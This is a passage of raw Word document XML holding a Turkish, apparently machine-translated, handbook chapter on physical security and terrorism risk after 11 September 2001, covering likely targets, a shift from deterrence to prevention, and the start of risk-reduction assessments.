      <w:bookmarkEnd w:id="196"/>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alışanların başkalarının içinden geçebileceği kapıyı açtığı şirketlerin güvenlik farkındalık düzeylerini gözden geçirmeleri gerekebilir. Fiziksel güvenlik programının uygulanmasındaki ilk adım, ihtiyaç seviyesinin ve mevcut farkındalık seviyesinin belirlenmesidir. Uygun maliyetli bir güvenlik programı uygulamak (1) sorunları analiz etmek, (2) kontrolleri tasarlamak veya tedarik etmek, (3) bu kontrolleri uygulamak, (4) bu kontrolleri test etmek ve uygulamak ve (5) kontrolleri izlemek. Yalnızca mevcut ihtiyaçları karşılamak için gereken kontrolleri uygulayın, ancak gerekirse daha sonra ilave kontrollerin eklenebileceğinden emin olun. Fiziksel güvenlik bir kuruluşun hırsızlığa, sabotajlara ve doğal afetlere karşı ilk savunma hattıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00624627" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Toc7996885"/>
      <w:r>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00624627">
        <w:t>Fiziksel güvenlik: 11 Eylül 2001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00624627">
        <w:t xml:space="preserve">Sonrası Tehdit </w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00624627" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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 şeyi değiştiren gün benim için sabah saat 5: 50'de başladı. Uyandım ve televizyonda bazı haberleri izlemeye başladım. Bu, 11 Eylül 2001, Salı sabahıydı. Yerel haber istasyonu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dece düzenli yayınını kesintiye uğratıp CNN’e geçti, o yüzden hemen önemli bir şey olduğunu biliyordum. Bir uçağın New York'taki Dünya Ticaret Merkezi kulelerinden birine çarptığını öğrendim. Güvensizlikle mutfağa giderken kendime bir fincan kahve döktüm. Televizyona döndüm ve gazetecileri dinledim ve havayolu uzmanları bu olayın olası nedenini tartışıyorlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [4].</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endi kendime düşündüm, “gökyüzünde bir bulut yok; Bir uçak yanlışlıkla bu kadar büyük bir yapıya nasıl çarpabilir?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Bilmek, ama cevabı kabul etmek istememekle, televizyonun daha iyi bir sonuç vereceğini umarak dinledi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Asla gelmeyen cevabı beklerken, ekranın sağ tarafından bir uçak geldiğini fark ettim. Ticaret Merkezi'nin kulelerinin arkasına gidiyor gibiydi, ya da belki de sadece olacağını umuyordum. Bu, zamanın dramatik bir şekilde yavaşladığı göründüğü örneklerden biriydi. Bölünmüş saniyede uçağın kulelerin arkasından çoktan çıkmış olması gerektiğinin farkına varıldı, ateş topu bunun yerine kulenin dışına fırladı. Şimdi inkar edilemezdi. Bu bir kaza değildi. Daha sonra başka bir fincan kahve içtikten sonra, sadece sigara görmek için televizyona geri döndüm; Sadece bir binanın yeni inşaat için yol açmaya başladığında gördüğünüz duman türü. Korkum için bir kulenin yıkıldığını biliyordum. Ardından, gazeteciler şoktan kurtulurken ve havadaki uyuşmalarını korumaya çalışırken, kalan kulenin tepesini gösterdiler. Bazı nedenlerden dolayı, kameranın yukarı kaydırmaya başladığı anlaşıldı. Biraz baş dönmesi hissetmeye başladım. Sonra, bir kez daha korkunç bir aydınlanma gerçekleşti. Kamera açılmıyordu; bina yıkılıyordu.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akikalar içinde, Dünya Ticaret Merkezi artık yoktu; ve Manhattan duman tarafından tamamen gizlendi. Tamamen güvensizlik içindeydim. Bu bir film olmalıydı; Ama değil. Zihnin kendini savunması, bir şey yapamadığı zaman meydana geldiğinde üstlenir ve kendimi tamamen uyuşmuş hissettim. Canlı TV'de anlatılmamış binlerce insanın ölümüne şahit oldum. 3000 mil uzakta olsam da, sahip olabileceği gib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caddede oldu. Etki aynıydı. Ardından Pentagon'daki kazanın haberi geldi, ardından Pennsylvania'daki uçağın kaz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u anda işler çok önemsiz görünse de işe gitmek için kendimi oluşturmaya çalıştım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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 nasılsa kendimi bir araya getirip kapıdan çıktım. İşe giderken kendime bunun benim kuşağımın İnci Limanı olması gerektiğini düşündüm. Ve farkettim ki, ülkem muhtemelen savaştaydı - peki kiminl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incisi, 11 Eylül sabahını hatırlamam. Bu gün, tarihte hepimizin nerede olduğumuzu ve ne yaptığımızı hatırladığımız o günlerden biri haline geldi. Hepimiz o korkunç günde kendi bireysel deneyimlerimiz olmasına rağmen, bazı insanlar diğerlerinden daha çok etkilenmiş olsa da, bu bireysel deneyimler hepimizi şaşırtan ve şok eden kolektif bir deneyim oluşturu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ünyanın her yerindeki ve özellikle ABD'deki güvenlik uygulayıcıları kendilerine bazı sorular sormak zorundadır. Bu burada olabilir mi? Kuruluşum potansiyel bir hedef mi? Şimdi 11 Eylül saldırılarının sonucunda Teröre Karşı Savaş başladığı için, bu soruların her ikisinin de cevabı ne yazık ki “eve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ncak, riski azaltmak için yapılabilecek bazı şeyler var. Bu bölüm terörizm riskinin neden arttığını, ne tür kuruluş veya tesislerin daha yüksek risk altında olduğunu ve bu riski azaltmak için neler yapılabileceğini incelemektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_Toc7996886"/>
      <w:r>
        <w:t xml:space="preserve">8.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>Amerika neden bir hedef?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w:rsidR="00E77DF4"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 ABD Hava Kuvvetleri Özel Harekat Merkezi'nden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Terörist grupların Amerika’yı hedef almasının birçok nedeni var. Bunun bir nedeni ideolojik farklılıklar. Amerikalılar tarafından benimsenen özgürlük ve hoşgörüyü takdir etmeyen uluslar veya kültürler var. Amerika, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tartışmasız dünyanın lider sanayi gücü ve kapitalist devletidir. Dünyada Amerika'yı bir soygun baronu olarak görebilecek ve algılanan zenginliğimizden dolayı Amerikalılardan nefret edebilecek insanlar var. Diğer bir sebep ise dini farklılıklar. Dini değerleri ve inançlarıyla uygunsuzluk algılanması nedeniyle Amerika ve Batı'yı hor görebilecek dini güdümlü gruplar var. Diğer bir neden, ABD hükümetinin diğer hükümetlerin eylemleri üzerinde çok fazla etkisi olduğu algısıdır. Teröristler, terör eylemleriyle ABD hükümetinin müzakere edeceğini ve nihayetinde taleplerine uyacağını düşünebilir. Ancak, hükümetimiz teröristler ile pazarlık yapmayacağını defalarca belirtt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Nihai neden, Amerikalıların kolay hedefler olarak algılanmasıdır. Amerika’da ve birçok Batı ülkesinde “açık toplum” teröristlerin kolay hareket etmesini ve faaliyetlerini kolaylaştırıyor. İster hayır kurumlarında, işletmelerde, kamu kapasitelerinde, ister turist olarak performans olsun, Amerikalılar tüm dünyada. Bu, Amerikalıları hedef almayı göreceli olarak zayıf eğitimli terörist gruplar için bile oldukça kolaylaştırmaktadır. Tüm dünyaya yayılmış olan ABD askeri kuvvetleri, ABD gücünün görünür sembolleri olarak görülmektedir ve bu nedenle teröristlere de çekici hedefler getirmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc7996887"/>
      <w:r>
        <w:t xml:space="preserve">8.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>Neden Endişe Edilmeli?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C"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zm, korkunun telkin edilmesi için hesaplanan şiddet kullanımı veya şiddet tehdidi olarak tanımlanabilir; genel olarak politik, dini veya ideolojik olan hedeflerin peşinde hükümetleri veya toplumları zorlamak veya bunlara göz yummak amacıyla tasarlanmıştır. Bazı terörist amaç ve taktik örnekleri Örnek 163.1'de görül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zm ve siber terörizm tehdidindeki artış, bilgi güvenliği uygulayıcıları için yeni ve önemli bir husustur. Önceden, fiziksel güvenlik tehditleri yetkisiz erişim, suç, çevre koşulları, sert hava koşulları, depremler, vs. gibi şeyleri içermekteydi. 11 Eylül olayları bize tam olarak ne kadar savunmasız olduğumuzu gösterdi. Güvenlik uygulayıcılarının o günden alabilecekleri en önemli derslerden biri de terörizmi içerecek şekilde fiziksel güvenlik uygulamalarımızı yeniden değerlendirme ihtiyacını tanımaktır. Karışıma terörizm eklemek, geleneksel fiziksel güvenliği görme biçimimizde bazı temel değişiklikleri gerektiriyor. Bu değişikliklerin teröre karşı koruyucu tedbirler içermesi gereki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Örgütün türüne bağlı olarak, teröristlerin onu hedef alabilmesi oldukça olası. İster fiziksel yıkım için tesisleri veya ofisleri hedefler, isterse siber saldırı için bir organizasyon seçtiler, temkinli bilgi güvenliği uygulayıcıları hedef aldıklarını ve buna göre plan yaptıklarını varsayarlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc7996888"/>
      <w:r>
        <w:t xml:space="preserve">8.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>Kurumunuz Potansiyel Bir Hedef midir?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C"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ek çok kuruluş teröristlerin potansiyel hedefi olabilir ve savunmasız olduklarını bile bilmiyorlar. Federal, eyalet ve yerel de dahil olmak üzere devlet kurumları ve altyapı şirketleri temel hedefler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iğer savunmasız kuruluşlar, dünyadaki Amerikan ürünlerini pazarlayan çok uluslu şirketler ve tanınmış gökdelenlerde bulunan kuruluşlar olabilir. Bu tür potansiyel hedeflerin spesifik örnekleri, onları daha yüksek risk altına sokma ihtimalini önlemek için adlandırılmayacaktır. Farklı potansiyel hedef türleri için bkz. Sergi 163.2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc7996889"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Terörist Amaçlara Örnekler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>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rubun davasının tanıtımını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rubun gücünü göst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Mevcut hükümetin güç eksikliğini göst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tikam al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Lojistik destek al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ükümetin aşırı tepki göstermesine neden ol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rtak Terörist Taktik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uikas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undakçılı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ombala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Rehine al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çır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çırma veya skyjacking</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aci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sislere saldırılar veya saldırı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botaj</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ldatmaca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Özel silah kullanım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evresel tahriba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knoloji kullanımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_Toc7996890"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Devlet kurumları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>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BD hükümetinden ve birçok Batı ülkesinden nefret eden birçok terörist var. Teröristlerin ve sempatizanların kafasında, hükümetler politikaları yaratıyor ve şiddetle karşı çıktığı değerleri temsil ediyorlar. Bir roket bilimcisi veya bu konuda bilgi güvenliği uygulayıcısı alma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BD hükümetinin ajanslarının teröristler için ana hedef olduğunun farkına varmak. Bu, elbette, ABD ordusunu da içerir. Diğer Batı ülkeleri, özellikle ABD’yi Terörle Mücadelede destekleyenler, kendilerini teröristlerin hedefleri de bulabilirler. Eyalet ve yerel yönetimler de risk altında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Altyapı şirketleri. Altyapıyı oluşturan şirketler de artan terör riskiyle karşı karşıya. Teröristler yalnızca ABD’ye ve Batı hükümetlerine zarar vermek istemeyecek, aynı zamanda normal yaşamı ve Batı dünyasının ekonomilerini de bozmak isteyebileceklerdir. Enerji, seyahat, finans ve bilgi akışını bozmak bunu başarmanın bir yoludur. Tıp sektörü de burada yer almaktadır. İnsan şimdi daha önce düşünülemez olanı düşünmeli, her zamanki zihniyetlerimizin ötesine bakmalı ve tıbbi tesisler daha önce hedef alınmadığı için gelecekte hedeflenebilecekleri düşünül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Lokasyon bazlı hedefler. Ayrıca, konumlarının veya işlevlerinin risk altında olduğu hedefleri de vardır. Tıpkı Dünya Ticaret Merkezi'nin kulelerinin Amerikan ekonomisinin 11 Eylül teröristlerine verdiği gücü temsil etmesi gibi, diğer yerler de düşmanca niyetli olanlara özgü olan Amerikalıları temsil ediyor olarak yorumlanabilir. Bu yerler, büyük şehirlerdeki gökdelenleri veya Amerikan veya Batı çıkarlarını temsil eden çeşitli simge yapılardan herhangi birini içerebilir. Popüler turist destinasyonları veya çok sayıda insanın katıldığı etkinlikler de riskli olabilir çünkü bunlar benzersiz bir şekilde Amerikan / Batı olmaları veya çok yoğun olmaları nedeniyle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merika anlamına gelen şeyler. Dikkate alınması gereken başka bir kategori var. Bu kategori yukarıdaki kategorilerle biraz örtüşüyor, ancak yine de söz edilmeyi hak ediyor. Amerika'yı veya Batı'yı dünyanın geri kalanına temsil eden büyük şirketler de hedeflenebilir. Bu aynı zamanda ürünleri dünya çapında satılan ve Amerika'yı dünya insanlarına temsil eden şirketleri de içermektedir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5].</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2 Potansiyel Terörist Hedef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evlet kurum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BD federal ajans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BD askeri tesis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evlet hükümet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lçe hükümet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erel yönetim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ltyap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nerj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aşımacılı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mal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terne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ıbb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onum tabanl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Uzun ofis bina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lusal yer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opüler turistik yer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üyük olay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merika ile ilişkil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atı dünyası ile eşanlamlı büyük şirket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merikan veya ABD adın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Ünlü Amerikan marka ürünlerini üreten şirketler</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 kuruluş yukarıdaki kategorilerden birine girerse, terörizmden daha önce düşünüldüğünden daha büyük bir risk ile karşı karşıya kalabilir. Bir kuruluş yukarıdaki kategorilerden birine uymuyorsa, bilgi güvenliği uygulamalarının mümkün olan en fazla anti-terörizm önlemi almaları tavsiye edilmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc7996891"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Paradigma Değişimi: Önleme Önleme</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A21B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İş, diğer mesleklerden çok, geleceğe yönelik sürekli bir iştir; bu sürekli bir hesaplamadır, öngörüde içgüdüsel bir alıştırma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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Henry R. Luce</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k işletme paradigması caydırıcı olmuştur. Bir failin yakalanmak, tutuklanmak veya hatta öldürülmek istememesi fikri, kabul edildiğimizi düşündüğümüz şekilde kök saldı. Muhtemelen şimdiye kadar hepimizin bildiği gibi, hararetli dini inançlar ya da bu bakış açısını paylaşmayan politik sebepler tarafından motive edilmiş insanlar var; nedenlerini ileri süreceklerine inandıkları bir eylemde bulunmak için ölmeye istekli olabilirler hatta ölmek isteyebilir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ünümüzde endüstri standardı olarak kabul edilen çoğu güvenlik koruması, caydırıcılık paradigmasına dayanmaktadır. Kameralar, alarmlar, röntgen veya kızılötesi algılama gibi güvenlik cihazlarının tümü, yakalanmak istemeyen bir failin caydırılması amacıyla kullanılmaktadır. Her ne kadar caydırıcılığa dayalı tedbirler, fiziksel güvenlik tehditlerinin ezici çoğunluğu için yeterli güvenlik sağlayacak olsa da, bu önlemler bir terör eylemi gerçekleştirirken ölmeyi planlayan birine karşı büyük ölçüde etkisiz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11 Eylül 2001 sabahı, acı verici bir ders öğrendik: caydırıcılık, aklındaki her türlü eylemi sürdürmek için ölmek isteyenleri caydırmaz. Ne yazık ki, bu fiziksel güvenliği çok daha zor ve pahalıdır. Bilgi güvenliği pratisyenlerinin yaygın kabul gördüğünün farkında olması gerek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güvenlik kameralarına, şifreli kapılara ve kimlik kartlarına sahip olmak gibi standartlar yalnızca potansiyel bir teröristi yavaşlatabilir. Davetsiz misafirleri caydırmak için çalışmak </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yerine, şimdi daha önce düşünülmemiş olan - intihar teröristini de düşünmeliyiz. Bu, terörist bir eylemde bulunmak için ölmek isteyen birinin önlenmesi için ne gibi önlemler alınması gerektiği anlamına ge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k: 11 Eylül 2001 1979’dan Sonra Tehdi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avayolu endüstrisi, 11 Eylül’de gerçekleşen olayların tekrarlanmasını önlemek için çok daha sıkı güvenlik önlemlerinin gerekli olduğunu öğrenmiş gibi görünmektedir. Daha önce, bir havayolu şirketinin en kötü kabusu bir uçağın bombalanması ya da kaçırılmasının ardından rehin yolcularını serbest bırakmak için gergin görüşmeler yapmaktı. . Hiç kimse bir uçağı kitle imha silahı olarak kullanma tehdidini düşünmedi. O zamandan beri uçuşan herkes ek gecikmelere, aramalara ve kimlik kontrollerine aşinadır. Rahatsız edici ve gezgin yavaşlatmak; Ancak, daha iyi güvenlik için ödemek için küçük bir fiyat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ala yapılacak daha çok iş olmasına rağmen, bu önleme paradigmasının kullanılmasına bir örnek teşkil edi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avayolları bu tür olayların önlenmesi için birçok güvenlik önlemi almıştır. Ne yazık ki, olduğu gib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lgi güvenliği, mutlak fiziksel güvenlik diye bir şey yoktur. Önceden düşünülmeyen bir şeyin ortaya çıkma olasılığı her zaman vardır. Bilgi güvenliği uygulayıcıları ayrıca gerekli fiziksel güvenlik değişikliklerini yapma yeteneklerini sınırlandırabilecek kurumsal / devlet bütçesi kısıtlamaları, risk değerlendirmeleri vb. İçinde çalışmak zorunda kalacaklardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Toc7996892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Terörizm Riskini Azaltma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A21B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu teröristlerin belirlenmesi Amerikan halkının tespitini caydırmayacak. Biz kurtulduk ve özgürlük kurtulan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A21B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Başsavcı John Ashcroft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A21B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11 Eylül 2001 tarihli basın toplantısı</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mdi neden daha büyük bir terörizm riskiyle karşı karşıya kaldığımızı ve kimin hedef olabileceğini daha iyi anlıyoruz, bu durum organizasyonlarımızı ve diğer çalışanlarımızı daha iyi nasıl koruyacağımıza dönüşüyor. Terörizm riskini azaltmanın birçok yöntemi var. Bu yöntemler arasında önceden tartışılan önleme paradigmasını kullanarak bir kuruluşun fiziksel güvenliğinin gözden geçirilmesi ve arttırılması; operasyonel güvenlik yoluyla hassas bilgilerin kontrol edilmesi; terör olayı ele alma prosedürlerinin geliştirilmesi; ve çalışanlar için güvenlik prosedürleri ve terörle mücadele prosedürleri oluşturmak. Bu yöntemlerin birçoğu, çalışan eğitimine ve başarılı olması için periyodik tatbikatlara dayanmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_Toc7996893"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fiziksel Güvenlik Değerlendirmeleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>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Riski azaltmada ilk adım, fiziksel ortamı kontrol etmektir. Bu bölümde, fiziksel güvenlik için endüstri standardı uygulamaları göstermek için standart terimini kullanıyoruz. Geliştirilmiş terimi, önleme paradigmasını içeren geliştirilmiş prosedürlere atıfta bulunacak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Standart Fiziksel Güvenlik Uygulamalarının Uygulandığını Doğrulayın Standart bir fiziksel güvenlik değerlendirmesi yapın ve gereken değişiklikleri uygulayın. Fiziksel güvenlik uygulamalarının en azından mevcut standartlarda olması önemlidir. Bunu yapmak aynı zamanda çoğu kişiden gelen riski de azaltacak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tandart fiziksel güvenlik tehditleri. Organizasyonları sorumlu tutma eğilimi bilgi güvenliğinde ortaya çıkmaya devam ettikçe, öngörülebilir gelecekte fiziksel güvenlikle de ortaya çıkması olas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elişmiş Bir Fiziksel Güvenlik Değerlendirmesi Yapın Standart fiziksel güvenlik uygulandığında, çok daha katı olan başka bir değerlendirme yapın. Bu değerlendirme, gelişmiş fiziksel güvenlik yöntemlerini içermelidir. Ne yazık ki, gelişmiş tehdide 